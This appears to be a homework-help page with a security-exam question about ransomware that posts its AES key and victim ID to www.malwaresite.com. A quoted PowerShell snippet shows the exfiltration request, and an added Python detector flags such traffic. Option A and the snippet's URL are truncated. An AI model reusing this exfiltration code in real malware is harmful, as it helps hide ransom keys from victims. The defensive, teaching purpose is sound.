
A company's computer was recently infected with ransomware. After encrypting al

ID: 3741801 • Letter: A

Question

A company's computer was recently infected with ransomware. After encrypting all documents, the malware logs a random AES-128 encryption key and associated unique identifier onto a compromised remote website. A ransomware code snippet is shown below:

    $sendit = New-Object -ComObject Msxml2.XMLHTTP
    $sendit.open("POST", "ht
    $sendit.setRequestHeader("Content-length", $post.length)
    $sendit.setRequestHeader("Connection", "close")
    $sendit.send("key=$RANDOMKEY&uid=$RANDOMUID")

Based on information from the code snippet, which of the following is the BEST way for a cybersecurity professional to monitor for the same malware in the future?

A. Configure the company proxy server to deny connections to
B. Reconfigure the enterprise antivirus to push more frequent updates to the clients
C. Write an ACL to block the IP address of www.malwaresite.com at the gateway firewall
D. Use an IDS custom signature to create an alert for connections to www.malwaresite.com

Explanation / Answer

On analysing the code supplied above, using an IDS custom signature to create an alert for connections to www.malwaresite.com will certainly be the best option for a cybersecurity professional to monitor the attack of the ransomware.

There are three advantages here:

(1) The IDS can successfully detect the malware, because the POST request is issued to a blacklisted address.

(2) The POST request that was to be sent can be logged and dissected by the sender once the IDS is triggered, to extract the AES-128 encryption key, which can be used to decrypt the files encrypted by the ransomware. In this way the files could be saved.

(3) The process and the corresponding program that issued this request can be pinpointed and purged in this way.
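
The signature logic described in the answer, as an added example that is not part of the original question or answer: it checks raw HTTP requests for a POST to www.malwaresite.com, records the source host, and pulls the key material from the body. The function names, the sample requests, the placeholder path and the `key`/`uid` body field names are assumptions.

```python
from urllib.parse import parse_qs

WATCHED_HOST = "www.malwaresite.com"  # domain named in the answer above

def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers, body

def inspect(raw: bytes, src_ip: str):
    """Return an alert dict if the request matches the signature, else None."""
    method, headers, body = parse_http_request(raw)
    # Normalise case, port and trailing dot so trivial variations still match.
    host = headers.get("host", "").split(":")[0].lower().rstrip(".")
    if method != "POST" or host != WATCHED_HOST:
        return None
    # Assumed body layout: form-encoded "key=<hex>&uid=<id>".
    fields = parse_qs(body.decode("latin-1"))
    return {
        "src_ip": src_ip,  # internal host that issued the request
        "key": fields.get("key", [None])[0],
        "uid": fields.get("uid", [None])[0],
    }

# Constructed sample traffic (not captured from real malware).
SAMPLES = [
    ("10.0.0.23", b"POST /placeholder HTTP/1.1\r\nHost: WWW.MalwareSite.com\r\n"
                  b"Content-Length: 45\r\nConnection: close\r\n\r\n"
                  b"key=00112233445566778899aabbccddeeff&uid=A1B2"),
    ("10.0.0.40", b"GET / HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
]

def run_samples():
    return [a for a in (inspect(raw, ip) for ip, raw in SAMPLES) if a]

if __name__ == "__main__":
    for alert in run_samples():
        print("ALERT", alert)
```

A sensor can read the request body only when the traffic is plain HTTP or passes through TLS inspection; otherwise the alert is limited to the destination name and the source host.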
